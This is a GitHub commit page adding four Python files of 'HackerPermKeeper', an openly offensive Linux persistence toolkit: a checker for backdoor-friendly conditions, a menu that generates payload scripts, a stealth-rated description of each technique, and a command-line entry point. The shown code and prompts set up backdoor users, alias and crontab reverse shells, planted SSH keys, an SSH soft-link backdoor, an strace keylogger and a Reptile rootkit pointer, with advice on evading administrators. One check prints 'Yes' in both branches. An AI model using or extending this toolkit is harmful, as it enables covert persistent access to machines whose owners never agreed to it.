-
Notifications
You must be signed in to change notification settings - Fork 82
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
16 changed files
with
1,010 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,115 @@ | ||
| # coding=utf-8 | ||
| # !/usr/bin/env python | ||
| # coding=utf-8 | ||
| from __future__ import print_function | ||
| import subprocess | ||
| import os | ||
| import platform | ||
|
|
||
|
|
||
| def ml(command): | ||
| process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) | ||
| process.wait() # 等待子进程完成 | ||
|
|
||
| stdout, stderr = process.communicate() # 获取子进程的输出和错误 | ||
| try: | ||
| decoded_stdout = stdout.decode('utf-8') | ||
| except UnicodeDecodeError: | ||
| decoded_stdout = stdout.decode('latin1') | ||
| try: | ||
| decoded_stderr = stderr.decode('utf-8') | ||
| except UnicodeDecodeError: | ||
| decoded_stderr = stderr.decode('latin1') | ||
| return decoded_stdout | ||
|
|
||
|
|
||
| def check_alerts(): | ||
| try: | ||
| output = subprocess.check_output(['alias'], stderr=subprocess.STDOUT, shell=True) | ||
| print("Yes----alerts后门") | ||
| except subprocess.CalledProcessError: | ||
| print("No----alerts后门") | ||
|
|
||
|
|
||
| def check_sshkey(): | ||
| file_path = "/root/.ssh/authorized_keys" | ||
| if os.path.exists(file_path): | ||
| print("Yes----ssh公私密钥后门") | ||
| else: | ||
| print("Yes----ssh公私密钥后门") | ||
|
|
||
|
|
||
| def check_adduser(): | ||
| root_gid = 0 # GID for "root" | ||
| # Get current user's GID | ||
| current_gid = os.getgid() | ||
| # Check if current user is a member of the root group | ||
| if current_gid == root_gid: | ||
| print("yes----ssh后门用户") | ||
| else: | ||
| print("No----ssh后门用户") | ||
|
|
||
|
|
||
| def check_crontab(): | ||
| cron_files = ["/etc/crontab"] | ||
| for cron_file in cron_files: | ||
| if os.access(cron_file, os.W_OK): | ||
| print("yes----计划任务后门") | ||
| else: | ||
| print("No----计划任务后门") | ||
|
|
||
|
|
||
| def check_strace(): | ||
| j = ml('strace -V') | ||
| if 'strace -- version' in j: | ||
| print("yes----strace后门") | ||
| else: | ||
| print("No----strace后门") | ||
|
|
||
|
|
||
| def check_ssh_Soft_link(): | ||
| command = 'cat /etc/ssh/sshd_config|grep UsePAM' | ||
| j = ml(command) | ||
| if 'UsePAM yes' in j: | ||
| print("yes----SSH软链接后门") | ||
| else: | ||
| print("No----SSH软链接后门") | ||
|
|
||
|
|
||
| def check_Rootkit(): | ||
| system_info = platform.uname() | ||
| kernel_version = platform.release() | ||
| # 定义支持的最低和最高内核版本 | ||
| min_kernel_version = { | ||
| 'Centos 6.10': '2.6.32-754.6.3.el6.x86_64', | ||
| 'Centos 7': '3.10.0-862.3.2.el7.x86_64', | ||
| 'Centos 8': '4.18.0-147.5.1.el8_1.x86_64', | ||
| 'Ubuntu 18.04.1 LTS': '4.15.0-38-generic' | ||
| } | ||
| max_kernel_version = { | ||
| 'Centos 6.10': '2.6.32', | ||
| 'Centos 7': '3.10.0', | ||
| 'Centos 8': '4.18.0', | ||
| 'Ubuntu 18.04.1 LTS': '4.15.0' | ||
| } | ||
| current_os = system_info[0] + ' ' + system_info[2] + ': ' + kernel_version | ||
| if current_os in min_kernel_version: | ||
| min_version = min_kernel_version[current_os] | ||
| max_version = max_kernel_version[current_os] | ||
|
|
||
| if min_version <= kernel_version <= max_version: | ||
| print("yes----Rootkit后门:https://github.com/f0rb1dd3n/Reptile/") | ||
| else: | ||
| print("No----Rootkit后门") | ||
|
|
||
|
|
||
| if __name__ == '__main__': | ||
| print('HackerPermKeeper') | ||
| print('OpenSSH后门太过久远,而且很可能会导致ssh连接报错,所以不建议使用[只测试过乌班图14版本成功]') | ||
| check_adduser() | ||
| check_alerts() | ||
| check_crontab() | ||
| check_ssh_Soft_link() | ||
| check_sshkey() | ||
| check_strace() | ||
| check_Rootkit() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,111 @@ | ||
| # coding=utf-8 | ||
| # !/usr/bin/env python | ||
| import sys | ||
|
|
||
| from colorama import init | ||
| from termcolor import colored | ||
| import os | ||
|
|
||
|
|
||
| init() | ||
|
|
||
|
|
||
| def Dowfile(input_files,file_name): | ||
| if not os.path.exists('payloads'): | ||
| os.makedirs('payloads') | ||
| with open(input_files, 'r', encoding='utf-8') as input_file, open('payloads/'+file_name, 'w+',encoding='utf-8') as output_file: | ||
| # 读取输入文件的内容 | ||
| content = input_file.read() | ||
|
|
||
| # 将内容写入输出文件 | ||
| output_file.write(content) | ||
| print(f'生成成功,文件为:/payloads/{file_name}') | ||
|
|
||
|
|
||
| def chooses(): | ||
| s = [] | ||
| i = 0 | ||
| print(colored('HackerPermKeeper v1.0 弱鸡 支持以下漏洞检测 https://github.com/ytMuCheng/HackerPermKeeper/', 'green')) | ||
| print(colored('1--------------OpenSSH后门', 'yellow'),colored('[利用]', 'red')) | ||
| print(colored('2--------------后门用户', 'yellow'),colored('[利用]', 'red')) | ||
| print(colored('3--------------Alias后门', 'yellow'),colored('[利用]', 'red')) | ||
| print(colored('4--------------crontab计划任务', 'yellow'),colored('[利用]', 'red')) | ||
| print(colored('5--------------ssh软连接后门', 'yellow'),colored('[利用]', 'red')) | ||
| print(colored('6--------------ssh公私密钥后门', 'yellow'),colored('[利用]', 'red')) | ||
| print(colored('7--------------Strace后门', 'yellow'),colored('[利用]', 'red')) | ||
| print(colored('8--------------Rootkit后门', 'yellow'),colored('[检测]', 'blue')) | ||
| print(colored('HackerPermKeeper[请输入多个模块序号, 一行一个,输入exit输出完成]', 'green')) | ||
| while True: | ||
| a = input(colored(f'[{i}]:', 'green')) | ||
| if a in ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'exit']: | ||
| i = i + 1 | ||
| if a != 'exit': | ||
| if a == str(1): | ||
| print('请修改生成完的文件,里面的记录明文的文件位置') | ||
| Dowfile('payload/1OpenSSH/sshOpenSSH.py','sshOpenSSH.py') | ||
| break | ||
| elif a == str(2): | ||
| print('请修改生成完的文件,里面的用户名和密码') | ||
| i = input('创不创home目录下用户文件夹[不创建的话,使用会出现一些bug,建议创建]:[1]不创建 [2]创建:') | ||
| if i == '1': | ||
| Dowfile('payload/adduser/adduser.py','adduser.py') | ||
| elif i == '2': | ||
| Dowfile('payload/adduser/adduser_new_user.py','adduser_new_user.py') | ||
| else: | ||
| print('输入错误') | ||
| break | ||
| elif a == str(3): | ||
| print('请修改生成完的文件,里面的反弹shell的ip以及port') | ||
| i = input('输入python版本[3 or 2]:') | ||
| if i == '3': | ||
| Dowfile('payload/alerts/alerts.py','alerts.py') | ||
| elif i == '2': | ||
| Dowfile('payload/alerts/alerts2.py','alerts2.py') | ||
| else: | ||
| print('输入错误') | ||
| break | ||
| elif a == str(4): | ||
| print('请修改生成完的文件,里面的反弹shell的ip以及port') | ||
| i = input('计划任务后门分为:[1]直接写入/etc/crontab文件中 or [2]直接使用crontab命令生成:') | ||
| if i == '1': | ||
| Dowfile('payload/crontab/etc_Cron.py', 'etc_Cron.py') | ||
| elif i == '2': | ||
| Dowfile('payload/crontab/Cron_n.py', 'Cron_n.py') | ||
| else: | ||
| print('输入错误') | ||
| break | ||
| elif a == str(5): | ||
| print('请修改生成完的文件,里面的连接端口 [连接ssh user@ip -p port]') | ||
| Dowfile('payload/ssh_Soft_link/ssh_Soft_link.py', 'ssh_Soft_link.py') | ||
| break | ||
| elif a == str(6): | ||
| i = input('ssh公私密钥后门分为:[1]在自己服务器生成 or [2]在目标机器生成:') | ||
| if i == '1': | ||
| print( | ||
| '生成之后,运行ssh-keygen -t ed25519 -N "admin!@#45123", -N为密码,注意需要把id_ed25519.pub,填入生成的文件id_ed25519_pub变量中,连接ssh -i id_ed25519 user@ip 如果连接报错,请输入chmod 600 id_ed25519') | ||
| Dowfile('payload/sshkey/sshkey_local.py', 'sshkey_local.py') | ||
| break | ||
| elif i == '2': | ||
| print('生成之后,修改文件中的password密码,在目标机器运行之后,下载/tmp/.11 密钥文件,连接ssh -i .11 root@ip 如果连接报错,请输入chmod 600 .11' | ||
| '在对方服务器运行之后,下载/tmp/.11文件,这个文件就是密钥文件,下载之后可以删除,然后在连接') | ||
| Dowfile('payload/sshkey/sshkey_target.py', 'sshkey_target.py') | ||
| break | ||
| else: | ||
| print('输入错误') | ||
| break | ||
| elif a == str(7): | ||
| print('请修改生成完的文件,里面的记录明文的文件位置') | ||
| Dowfile('payload/strace/sshd.py','sshd.py') | ||
| break | ||
| elif a == str(8): | ||
| print('项目地址:https://github.com/f0rb1dd3n/Reptile/') | ||
| break | ||
| else: | ||
| print('Null') | ||
| break | ||
| else: | ||
| pass | ||
| break | ||
| else: | ||
| print("输入无效,请重新输入!") | ||
| a = input(colored(f'[{i}]:', 'green')) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,47 @@ | ||
| # coding=utf-8 | ||
| # !/usr/bin/env python | ||
|
|
||
|
|
||
| from colorama import init | ||
| from termcolor import colored | ||
|
|
||
| init() | ||
|
|
||
|
|
||
| def configs(): | ||
| print(colored('HackerPermKeeper v1.0 by 弱鸡 支持以下漏洞检测 https://github.com/ytMuCheng/HackerPermKeeper/', 'green')) | ||
| print(colored('1--------------OpenSSH后门', 'yellow'),colored('[利用]', 'red')) | ||
| print('OpenSSH后门 优点:直接重置目标服务器的OpenSSH,在里面写入万能密码以及记录ssh明文账户代码 '' 缺点:需要依大量的依赖环境,而且只能使用低版本系统,目前经过测试的有乌班图14',colored('[建议指数:*]\n', 'red')) | ||
|
|
||
| print(colored('2--------------后门用户', 'yellow'),colored('[利用]', 'red')) | ||
| print('后门用户 优点:直接写入后门用户,而且不生成home目录下文件,快捷方便,所有系统支持 缺点:容易发现',colored('[**]\n', 'red')) | ||
|
|
||
| print(colored('3--------------Alias别名后门', 'yellow'),colored('[利用]', 'red')) | ||
| print('Alias别名后门 优点:使用别名来执行命令或者反弹shell,如执行ls,设置之后,就会反弹shell 缺点:需要当前用户执行命令为常用命令',colored('[***]\n', 'red')) | ||
|
|
||
| print(colored('4--------------crontab计划任务', 'yellow'),colored('[利用]', 'red')) | ||
| print('crontab计划任务 优点:设置计划任务来执行反弹shell,其中参考了挖矿病毒计划任务,其中有直接执行crontab来写入,还有直接写入/etc/crontab文件中 缺点:出网执行反弹shell,在流量会被发现',colored('[****]\n', 'red')) | ||
|
|
||
| print(colored('5--------------ssh软连接后门', 'yellow'),colored('[利用]', 'red')) | ||
| print('ssh软连接后门 优点:快速设置ssh连接,不需要密码 缺点:在流量会被发现',colored('[****]\n', 'red')) | ||
|
|
||
| print(colored('6--------------ssh公私密钥后门', 'yellow'),colored('[利用]', 'red')) | ||
| print('ssh公私密钥后门 优点:快速设置密钥连接,其中参考了挖矿病毒ssh公私密钥,管理员很难发现 缺点:在流量会被发现', colored('[*****]\n', 'red')) | ||
|
|
||
| print(colored('7--------------Strace后门', 'yellow'),colored('[利用]', 'red')) | ||
| print('Strace后门 优点:键盘记录的后门,记录ssh明文以及密钥 缺点:需要配合权限维持使用',colored('[****]\n', 'red')) | ||
|
|
||
| print(colored('8--------------Rootkit后门', 'yellow'),colored('[检测]', 'blue')) | ||
| print('Rootkit后[使用的是github项目] 优点:很难发现,几乎不可能发现,而且Rootkit后门包括了反弹shell[使用netstat -tulnp,不会显示],文件隐藏等 缺点:对于系统版本要求很严格',colored('[******]', 'red')) | ||
| print('项目地址:https://github.com/f0rb1dd3n/Reptile/') | ||
|
|
||
| def configss(): | ||
| print(colored('HackerPermKeeper v1.0 by 弱鸡 支持以下漏洞检测 https://github.com/ytMuCheng/HackerPermKeeper/', 'green')) | ||
| print(colored('1--------------OpenSSH后门', 'yellow'),colored('[利用]', 'red')) | ||
| print(colored('2--------------后门用户', 'yellow'),colored('[利用]', 'red')) | ||
| print(colored('3--------------Alias后门', 'yellow'),colored('[利用]', 'red')) | ||
| print(colored('4--------------crontab计划任务', 'yellow'),colored('[利用]', 'red')) | ||
| print(colored('5--------------ssh软连接后门', 'yellow'),colored('[利用]', 'red')) | ||
| print(colored('6--------------ssh公私密钥后门', 'yellow'),colored('[利用]', 'red')) | ||
| print(colored('7--------------Strace后门', 'yellow'),colored('[利用]', 'red')) | ||
| print(colored('8--------------Rootkit后门', 'yellow'),colored('[检测]', 'blue')) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,45 @@ | ||
| # coding=utf-8 | ||
| # !/usr/bin/env python | ||
|
|
||
|
|
||
| from colorama import init | ||
| from termcolor import colored | ||
| from argparse import ArgumentParser | ||
| import os | ||
| import sys | ||
|
|
||
| from config import configs | ||
| from config import configss | ||
| from choose import chooses | ||
|
|
||
| init() | ||
|
|
||
|
|
||
| try: | ||
| name = colored('HackerPermKeeper v1.0 by 弱鸡 https://github.com/ytMuCheng/HackerPermKeeper/', 'green') | ||
| arg = ArgumentParser(description=name ) # 创建解析器, description内容就是 | ||
| arg.add_argument("-m", "--multiple", help="选择权限维持模块 -m 1") | ||
| arg.add_argument("-c", "--config", help="查看支持的权限维持模块 -c 1,查看详细使用说明 -c 2 ") | ||
| args = arg.parse_args() # 解析参数 | ||
| multiple = args.multiple # 接受参数 | ||
| config = args.config # 接受参数 | ||
| if multiple != None or config != None: | ||
| if multiple != None: | ||
| chooses() | ||
| if config != None: | ||
| if config == '1': | ||
| configss() | ||
| elif config == '2': | ||
| configs() | ||
| else: | ||
| print('输入错误') | ||
| configss() | ||
|
|
||
| else: | ||
| os.system('python main.py -h') | ||
| sys.exit() | ||
|
|
||
| except KeyboardInterrupt as error: # ctr +c | ||
| print(colored(f'\n------------------------------------------', 'red'), '{', colored("程序终止", "green"), '}', | ||
| colored(f'------------------------------------------', 'red')) | ||
| sys.exit() |
Oops, something went wrong.